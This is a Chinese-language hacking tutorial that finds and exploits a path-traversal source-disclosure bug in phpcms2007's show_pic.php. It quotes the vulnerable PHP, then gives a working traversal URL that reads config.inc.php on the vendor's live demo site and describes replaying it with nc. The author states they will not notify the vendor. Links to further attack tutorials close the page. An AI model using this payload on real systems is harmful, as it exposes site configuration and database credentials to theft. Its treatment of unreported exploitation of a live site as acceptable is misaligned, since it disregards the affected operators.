关于简单的php源代码泄露漏洞的发掘                
                
                    所属分类:
                        网络安全 / 黑客教程                    
                    阅读数:
                        121
                    
                        收藏 0赞 0分享
                    
                 
                
                    我们知道在asp中出现得最多的还是sql注入,不过在php中由于magic_quotes_gpc为on的情况下特殊字符会被转义,所以即使有很多时候存在sql注入也无法利用。但是php强大的文件操作功能却使我们能体会到在asp中无法体会的乐趣,我想php自带的文件操作函数能让你为之心跳加快~~嘿嘿 
这次我发掘的是phpcms2007的源代码泄露漏洞 
再次向Phpcms2007的开源行为致敬!! 
开始吧, 
findstr /s /n /i readfile *.php >readfile.txt (结果我只给出有用的) 
其他的文件操作函数可以自己定义查找 
module\picture\show_pic.inc.php:8:readfile($file); 
跟进这个文件看看吧,呵呵,比较小,我喜欢 
[Copy to clipboard] [ - ]CODE: 
<?php  
defined(’IN_PHPCMS’) or exit(’Access Denied’); 
require PHPCMS_ROOT.’/module/’.$mod.’/include/common.inc.php’; 
isset($src) or exit; 
$file = PHPCMS_ROOT.’/’.$PHPCMS[’uploaddir’].’/’.$CHA[’channeldir’].’/’.$MOD[’upload_dir’].’/’.$src; 
if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.’/images/error.jpg’; 
header("Content-type:image/pjpeg"); 
readfile($file); 
?> 
一路分析下。。。 
先包含文件/module/’.$mod.’/include/common.inc.php 
如果存在变量$src则赋予它路径并把值交给变量$file 
然后就是就进入if 
这里我不看其他的文件简单猜测下应该是判断url路径来源,也就是防盗链的功能 
然后就header()一个图片头 
呵呵,轻轻松松就readfile($file); 
可以看出它没有判断$src的文件类型,如果我们提交一个src=*.php也会被readfile 
好吧,在这里漏洞是出现了 
不过由于“defined(’IN_PHPCMS’) or exit(’Access Denied’);”,所以我们是无法直接利用这个漏洞文件的 
只能是在其他包含这个文件的php文件中利用 
继续吧 
[Copy to clipboard] [ - ]CODE: 
findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt 
picture\show_pic.php:4:require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php"; 
进去看看 
[Copy to clipboard] [ - ]CODE: 
<?php  
require "./config.inc.php"; 
require "../include/common.inc.php"; 
require PHPCMS_ROOT."/module/".$mod."/show_pic.inc.php"; 
?> 
呵呵,要是register_globals为on的话就可以直接利用这个文件读取目标文件了 
那就测试吧 
官方是演示站是 
[Copy to clipboard] [ - ]CODE: 
http://demo.phpcms.cn/ 
那就这样构造url 
[Copy to clipboard] [ - ]CODE: 
/picture/show_pic.php?src=/../../../config.inc.php 
嘿嘿,读取的就是网站的配置文件 
直接访问 
[Copy to clipboard] [ - ]CODE: 
http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php 
呵呵,猜测没错!! 
那我们可以先访问http://demo.phpcms.cn/抓包 
用nc发包 
get选项就设置为 
[Copy to clipboard] [ - ]CODE: 
/picture/show_pic.php?src=/../../../config.inc.php 
这里我就用刺猬的一个post提交工具代替了 
测试结果如图 
ok,就分析到这里了 
希望大家不要利用这个做违法的事,嘿嘿!! 
偶是坏孩子,不通知官方了~·好孩子去通知下。
                                    
             
            
                
                CSRF的攻击方式详解 黑客必备知识
CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF
                    
                    收藏 0赞 0分享
抓取管理员hash值(哈希)的另类方法
哈希算法将任意长度的二进制值映射为固定长度的较小二进制值,这个小的二进制值称为哈希值。哈希值是一段数据唯一且极其紧凑的数值表示形式。如果散列一段明文而且哪怕只更改该段落的一个字母,随后的哈希都将产生不同的值。要找到散列为同一个值的两个不同的输入,在计
                    
                    收藏 0赞 0分享
网站安全教程 绕过D盾进行注入的方法(图文教程)
D盾_IIS防火墙专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计! 限制了常见的入侵方法,让服务器更安全!
                    
                    收藏 0赞 0分享
局域网安全教程 HSRP攻击和防范的方法介绍(图文教程)
热备份路由器协议(HSRP)的设计目标是支持特定情况下 IP 流量失败转移不会引起混乱、并允许主机使用单路由器,以及即使在实际第一跳路由器使用失败的情形下仍能维护路由器间的连通性。换句话说,当源主机不能动态知道第一跳路由器的 IP 地址时,HSRP 协议能够保护第一
                    
                    收藏 0赞 0分享
SQL通用防注入系统asp版漏洞
今晚群里朋友叫看个站,有sql防注入,绕不过,但是有发现记录wrong的文件sqlin.asp。
                    
                    收藏 0赞 0分享
                 查看更多